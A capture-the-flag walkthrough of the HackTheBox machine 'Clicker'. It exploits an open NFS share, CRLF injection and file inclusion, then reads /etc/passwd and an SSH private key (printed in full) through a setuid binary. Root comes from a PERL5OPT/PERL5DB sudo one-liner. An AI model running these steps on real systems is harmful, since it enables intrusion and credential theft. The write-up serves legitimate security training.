Clicker
HackTheBox Machine ➡️ Medium #CRLF #NFS #RFI #perl #putty_gen
Description ⤵️
This machine from HackTheBox , is categorized as Medium Level Machine . It focuses into NFS shares , I learned about perl and about web part alot from this machine.
Port Scan Results ⤵️
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker]
└─$ sudo nmap -sC -sV -p- -T4 -oN Nmap_Result.txt 10.10.11.232
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-18 19:35 IST
Nmap scan report for 10.10.11.232
Host is up (0.16s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 89:d7:39:34:58:a0:ea:a1:db:c1:3d:14:ec:5d:5a:92 (ECDSA)
|_ 256 b4:da:8d:af:65:9c:bb:f0:71:d5:13:50:ed:d8:11:30 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://clicker.htb/
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 36832/udp mountd
| 100005 1,2,3 41569/tcp mountd
| 100005 1,2,3 43997/udp6 mountd
| 100005 1,2,3 51525/tcp6 mountd
| 100021 1,3,4 36385/tcp nlockmgr
| 100021 1,3,4 38954/udp6 nlockmgr
| 100021 1,3,4 43017/tcp6 nlockmgr
| 100021 1,3,4 54393/udp nlockmgr
| 100024 1 34209/udp6 status
| 100024 1 41235/tcp6 status
| 100024 1 42573/tcp status
| 100024 1 60124/udp status
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/tcp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
36385/tcp open nlockmgr 1-4 (RPC #100021)
41569/tcp open mountd 1-3 (RPC #100005)
42573/tcp open status 1 (RPC #100024)
55593/tcp open mountd 1-3 (RPC #100005)
57471/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSF Enumeration ⤵️
Firstly I enumerated the NFS shares through showmount command →
1
2
3
4
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker]
└─$ showmount -e 10.10.11.232
Export list for 10.10.11.232:
/mnt/backups *
Now I have to make a directory for accessing NFS Shares →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker]
└─$ mkdir /tmp/nfs
mkdir: cannot create directory ‘/tmp/nfs’: File exists
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker]
└─$ sudo mount -v -t nfs -o vers=3,proto=tcp,nolock 10.10.11.232:/mnt/backups /tmp/nfs
[sudo] password for kali:
mount.nfs: timeout set for Sat Nov 18 19:39:48 2023
mount.nfs: trying text-based options 'vers=3,proto=tcp,nolock,addr=10.10.11.232'
mount.nfs: prog 100003, trying vers=3, prot=6
mount.nfs: trying 10.10.11.232 prog 100003 vers 3 prot TCP port 2049
mount.nfs: prog 100005, trying vers=3, prot=6
mount.nfs: trying 10.10.11.232 prog 100005 vers 3 prot TCP port 41569
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker]
└─$ ls -al /tmp/nfs
total 2240
drwxr-xr-x 2 nobody nogroup 4096 Sep 6 00:49 .
drwxrwxrwt 18 root root 4096 Nov 18 19:36 ..
-rw-r--r-- 1 root root 2284115 Sep 2 01:57 clicker.htb_backup.zip
Now lets transfer that into the Attackers machine →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker]
└─$ cp /tmp/nfs/clicker.htb_backup.zip .
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker]
└─$ mkdir clicker_backup_zip
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker]
└─$ cd clicker_backup_zip
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker/clicker_backup_zip]
└─$ unzip ../clicker.htb_backup.zip
Archive: ../clicker.htb_backup.zip
creating: clicker.htb/
inflating: clicker.htb/play.php
inflating: clicker.htb/profile.php
inflating: clicker.htb/authenticate.php
...
...
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker/clicker_backup_zip]
└─$ cd clicker.htb
┌──(kali㉿kali)-[~/…/HTB/Clicker/clicker_backup_zip/clicker.htb]
└─$ ls -al
total 72
drwxr-xr-x 4 kali kali 4096 Sep 2 01:51 .
drwxr-xr-x 3 kali kali 4096 Nov 18 19:39 ..
-rw-rw-r-- 1 kali kali 3934 Sep 2 01:48 admin.php
drwxr-xr-x 4 kali kali 4096 Feb 28 2023 assets
-rw-rw-r-- 1 kali kali 608 Sep 2 01:47 authenticate.php
-rw-rw-r-- 1 kali kali 541 Sep 2 01:47 create_player.php
-rw-rw-r-- 1 kali kali 2536 Sep 2 01:48 db_utils.php
-rw-r--r-- 1 kali kali 1376 Sep 2 01:48 diagnostic.php
-rw-rw-r-- 1 kali kali 1977 Sep 2 01:48 export.php
drwxr-xr-x 2 kali kali 4096 Sep 2 01:48 exports
-rw-rw-r-- 1 kali kali 3887 Sep 2 01:48 index.php
-rw-rw-r-- 1 kali kali 3423 Sep 2 01:48 info.php
-rw-rw-r-- 1 kali kali 3301 Sep 2 01:48 login.php
-rw-rw-r-- 1 kali kali 74 Sep 2 01:47 logout.php
-rw-rw-r-- 1 kali kali 3341 Sep 2 01:47 play.php
-rw-rw-r-- 1 kali kali 3070 Sep 2 01:47 profile.php
-rw-rw-r-- 1 kali kali 3333 Sep 2 01:48 register.php
-rw-rw-r-- 1 kali kali 563 Sep 2 01:48 save_game.php
Now I have a domain name to lets set the /etc/hosts file as clicker.htb and lets enumerate the web part .
Web Enumeration ⤵️
Lets see the webpage first :
Lets register a user first shiva : shiva →
After Login into the site I got 2 options →
I checked the option Play and got 2 parameters as click and level while interceting with burpsuite →
And as I also got those php source code files from NFS share so Lets check the source code what it is for and what else can be done to escalate the privileges from normal user to Admin user →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
┌──(kali㉿kali)-[~/…/HTB/Clicker/clicker_backup_zip/clicker.htb]
└─$ cat play.php
<?php
session_start();
if (! $_SESSION["ROLE"]) {
header('Location: /index.php');
die;
}
?>
<html>
<head>
<link href="/assets/cover.css" rel="stylesheet">
<link href="/assets/css/bootstrap.min.css" rel="stylesheet">
<style>
body {
margin:0px;
}
.center {
margin: 40px;
}
.round{
font-size: 12px;
color: #4D5259;
line-height: 1.5;
font-weight: bold;
padding: .5em 2em;
background: #FFFFFF;
border: 2px solid #4D5259;
box-shadow: 4px 4px 0 0 #4D5259;
border-radius: 100px;
outline:0;
transition: ease all .1s;
}
.round:active {
transform: translateY(4px) translateX(4px);
box-shadow: 0px 0px 0 0 #4D5259;
}
.square {
font-size: 10px;
color: #4D5259;
line-height: 1.5;
font-weight: bold;
padding: .5em 2em;
background: #FFFFFF;
border: 2px solid #4D5259;
box-shadow: 4px 4px 0 0 #4D5259;
outline:0;
}
.square:active {
transform: translateY(4px) translateX(4px);
box-shadow: 0px 0px 0 0 #4D5259;
}
.square:hover {
background: #d3d3d3;
}
</style>
</head>
<title>Clicker - The Game</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<body class="h-100 text-light bg-dark">
<script>
money = <?php echo $_SESSION["CLICKS"]; ?>;
update_level = <?php echo $_SESSION["LEVEL"]; ?>;
money = parseInt(money);
update_level = parseInt(update_level);
upgrade_cost = 15 * (5 ** update_level);
money_increment = upgrade_cost / 15;
function addcomma(x) {
return x.toString().replace(/\B(?=(\d{3})+(?!\d))/g, ",")
}
function saveAndClose() {
window.location.replace("/save_game.php?clicks="+money+"&level="+update_level);
}
function clicked() {
money += money_increment;
document.getElementById("total").innerHTML = "Clicks: " + addcomma(money);
}
function upgrade() {
if (money >= upgrade_cost) {
money_increment += upgrade_cost / 15;
money -= upgrade_cost;
update_level += 1;
upgrade_cost = upgrade_cost * 5;
document.getElementById("upgrade").innerHTML = addcomma(update_level) + " - LevelUP Cost: " + addcomma(upgrade_cost);
}
document.getElementById("click").innerHTML = "Level: " + addcomma(update_level);
document.getElementById("total").innerHTML = "Clicks: " + addcomma(money);
}
</script>
<br><br>
<center class='text-center'>
<h1 id='total'>Clicks: 0</h1>
<h5 id="click" style="font-family:trebuchet MS;">Level: 0</h5>
<img class="round" src="assets/cursor.png" width="150" onclick='clicked()'></img>
<br><br>
<button id='upgrade' class="round" onclick='upgrade()' style="font-family:courier;">0 - LevelUP cost: 15</button><br><br>
<button class="square" onclick="saveAndClose()">Save and close</button>
</center>
<script>
document.addEventListener('DOMContentLoaded', function() {
document.getElementById("upgrade").innerHTML = addcomma(update_level) + " - LevelUP Cost: " + addcomma(upgrade_cost);
document.getElementById("click").innerHTML = "Level: " + addcomma(update_level);
document.getElementById("total").innerHTML = "Clicks: " + addcomma(money);
}, false);
</script>
</link>
</body>
</meta>
</html>
In the starting of the session ROLE variable is required so after some enumeration I got to know from authenticate.php file that the ROLE signifies the profile or designation →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~/…/HTB/Clicker/clicker_backup_zip/clicker.htb]
└─$ cat authenticate.php
<?php
session_start();
include_once("db_utils.php");
if (isset($_POST['username']) && isset($_POST['password']) && $_POST['username'] != "" && $_POST['password'] != "") {
if(check_auth($_POST['username'], $_POST['password'])) {
$_SESSION["PLAYER"] = $_POST["username"];
$profile = load_profile($_POST["username"]);
$_SESSION["NICKNAME"] = $profile["nickname"];
$_SESSION["ROLE"] = $profile["role"];
$_SESSION["CLICKS"] = $profile["clicks"];
$_SESSION["LEVEL"] = $profile["level"];
header('Location: /index.php');
}
else {
header('Location: /login.php?err=Authentication Failed');
}
}
?>
so lets try to provide the role value as Admin so that the user shiva can be authenticated as Admin user →
It gives an error as Malicious activity detected! and After trying so many things I used the CRLF (%0D%0A) Injection to invade this error and bypass this Error Detection →
After Forwording the request I received Success message →
Now I Logged out of the site and relogin as same user and Now I have Adminstrator privileges →
Lets see the Content of Adminstration →
I have 3 Keys and its values Nickname , Click , and Level and I have the option to export the file in a format so lets include the RFI payload in a nickname and Export that document in php format →
It was successfully responded , Now I have to export in php format and then I will be tring RFI (Remote File Inclusion) method in it →
Now I got this URL exports/File_name.php I will be tring RFI on it →
Now I can have a shell here →
In response to that I have a shell →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
www-data@clicker:/var/www/clicker.htb/exports$ whoami
www-data
www-data@clicker:/var/www/clicker.htb/exports$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@clicker:/var/www/clicker.htb/exports$ cd /home
www-data@clicker:/home$ ls
jack
www-data@clicker:/home$ cd jack
bash: cd: jack: Permission denied
www-data@clicker:/home$ cd /opt
www-data@clicker:/opt$ ls
manage monitor.sh
www-data@clicker:/opt$
www-data@clicker:/opt$ cd manage
www-data@clicker:/opt/manage$ ls -al
total 28
drwxr-xr-x 2 jack jack 4096 Jul 21 22:29 .
drwxr-xr-x 3 root root 4096 Jul 20 10:00 ..
-rw-rw-r-- 1 jack jack 256 Jul 21 22:29 README.txt
-rwsrwsr-x 1 jack jack 16368 Feb 26 2023 execute_query
www-data@clicker:/opt/manage$
this file execute_query is a binary executable file so lets see what is does according to README.txt file it does these workes →
1
2
3
4
5
6
7
8
9
www-data@clicker:/opt/manage$ cat README.txt
Web application Management
Use the binary to execute the following task:
- 1: Creates the database structure and adds user admin
- 2: Creates fake players (better not tell anyone)
- 3: Resets the admin password
- 4: Deletes all users except the admin
www-data@clicker:/opt/manage$
Through Inspection It does these workes →
The values denotes the options that will work upon it →
so option 5 is File not readable or not found that indicated that it will be accessing documents so lets access some information like private keys and /etc/passwd values through this →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
www-data@clicker:/opt/manage$ ./execute_query 5 ../../../etc/passwd
mysql: [Warning] Using a password on the command line interface can be insecure.
--------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
jack:x:1000:1000:jack:/home/jack:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:114:120:MySQL Server,,,:/nonexistent:/bin/false
_rpc:x:115:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:116:65534::/var/lib/nfs:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
--------------
ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
' at line 1
www-data@clicker:/opt/manage$
Now the private key value →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
www-data@clicker:/opt/manage$ ./execute_query 5 ../.ssh/id_rsa
mysql: [Warning] Using a password on the command line interface can be insecure.
--------------
-----BEGIN OPENSSH PRIVATE KEY---
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
-----END OPENSSH PRIVATE KEY---
--------------
ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-----BEGIN OPENSSH PRIVATE KEY---
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAA' at line 1
www-data@clicker:/opt/manage$
Now I copied the Private key to my Attackers machine but it is not in format of id_rsa so I compared it with my own Private key and corrected the format there .
But still I got this error →
1
2
3
4
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker]
└─$ ssh -i id_rsa jack@10.10.11.232
Load key "id_rsa": error in libcrypto
jack@10.10.11.232's password:
So I researched on web related to this error resolve and I found a command that will convert the format in its asking format like this →
I was getting error when my format of id_rsa was not resolved →
1
2
3
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker]
└─$ sudo puttygen id_rsa -O private-openssh -o id_rsa.conv
puttygen: error loading `id_rsa': file does not begin with OpenSSH new-style key header
After correction in my format I rerun the command and it worked and I got this id_rsa.conv private key I set the permissions as chmod 600 id_rsa.conv after that →
1
2
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker]
└─$ sudo puttygen id_rsa -O private-openssh -o id_rsa.conv
SSH Shell ⤵️
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
┌──(root㉿kali)-[/home/kali/Downloads/HTB/Clicker]
└─# ssh -i id_rsa.conv jack@10.10.11.232
The authenticity of host '10.10.11.232 (10.10.11.232)' can not be established.
ED25519 key fingerprint is SHA256:OAOlD4te1rIAd/MBDNbXq9MuDWSFoc6Jc3eaBCC5u7o.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.232' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-84-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Nov 20 08:45:20 AM UTC 2023
System load: 0.0
Usage of /: 53.5% of 5.77GB
Memory usage: 16%
Swap usage: 0%
Processes: 244
Users logged in: 0
IPv4 address for eth0: 10.10.11.232
IPv6 address for eth0: dead:beef::250:56ff:feb9:4cf4
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
jack@clicker:~$
Now I have a proper shell so lets dig deeper →
1
2
3
4
5
6
7
jack@clicker:/$ sudo -l
Matching Defaults entries for jack on clicker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User jack may run the following commands on clicker:
(root) SETENV: NOPASSWD: /opt/monitor.sh
jack@clicker:/$
I found that this file /opt/monitor.sh is using /usr/bin/xml_pp command and this command basically works though perl →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
jack@clicker:/$ cat /opt/monitor.sh
#!/bin/bash
if [ "$EUID" -ne 0 ]
then echo "Error, please run as root"
exit
fi
set PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
unset PERL5LIB;
unset PERLLIB;
data=$(/usr/bin/curl -s http://clicker.htb/diagnostic.php?token=secret_diagnostic_token);
/usr/bin/xml_pp <<< $data;
if [[ $NOSAVE == "true" ]]; then
exit;
else
timestamp=$(/usr/bin/date +%s)
/usr/bin/echo $data > /root/diagnostic_files/diagnostic_${timestamp}.xml
fi
jack@clicker:/$
This /usr/bin/xml_pp command is using perl language and after some recon I got the exploit for escalating the privileges to root →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
jack@clicker:/$ cat /usr/bin/xml_pp
#!/usr/bin/perl -w
# $Id: /xmltwig/trunk/tools/xml_pp/xml_pp 32 2008-01-18T13:11:52.128782Z mrodrigu $
use strict;
use XML::Twig;
use File::Temp qw/tempfile/;
use File::Basename qw/dirname/;
my @styles= XML::Twig->_pretty_print_styles; # from XML::Twig
my $styles= join '|', @styles; # for usage
my %styles= map { $_ => 1} @styles; # to check option
my $DEFAULT_STYLE= 'indented';
my $USAGE= "usage: $0 [-v] [-i<extension>] [-s ($styles)] [-p <tag(s)>] [-e <encoding>] [-l] [-f <file>] [<files>]";
# because of the -i.bak option I don't think I can use one of the core
# option processing modules, so it's custom handling and no clusterization :--(
...
...
I used this exploit perl_startup that exploit works on Perl injection vulnerability →
https://www.exploit-db.com/exploits/39702
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
jack@clicker:/$ ls -al /bin/bash
-rwxr-xr-x 1 root root 1396520 Jan 6 2022 /bin/bash
jack@clicker:/$ sudo PERL5OPT=-d PERL5DB='exec "chmod u+s /bin/bash"' /opt/monitor.sh
Statement unlikely to be reached at /usr/bin/xml_pp line 9.
(Maybe you meant system() when you said exec()?)
jack@clicker:/$ ls -al /bin/bash
-rwsr-xr-x 1 root root 1396520 Jan 6 2022 /bin/bash
jack@clicker:/$ /bin/bash -p
bash-5.1# whoami
root
bash-5.1# id
uid=1000(jack) gid=1000(jack) euid=0(root) groups=1000(jack),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev)
bash-5.1# cd /root
bash-5.1# ls -al
total 40
drwx------ 7 root root 4096 Sep 6 12:40 .
drwxr-xr-x 18 root root 4096 Sep 5 19:19 ..
lrwxrwxrwx 1 root root 9 Sep 5 18:46 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc
drwx------ 2 root root 4096 Feb 25 2023 .cache
drwxr-xr-x 2 root root 4096 Nov 20 09:16 diagnostic_files
drwxr-xr-x 3 root root 4096 Feb 25 2023 .local
lrwxrwxrwx 1 root root 9 Sep 6 12:30 .mysql_history -> /dev/null
-rw-r--r-- 1 root root 193 Feb 27 2023 .profile
drwxr-xr-x 2 root root 4096 Sep 5 19:19 restore
-rw-r----- 1 root root 33 Nov 19 23:11 root.txt
drwx------ 2 root root 4096 Sep 6 12:36 .ssh
bash-5.1# cat root.txt
ac684e5dab6e8838569f079935515914
bash-5.1#
Now I am root !!
If you have any questions or suggestions, please leave a comment below. Thank You !
This post is licensed under CC BY 4.0 by the author.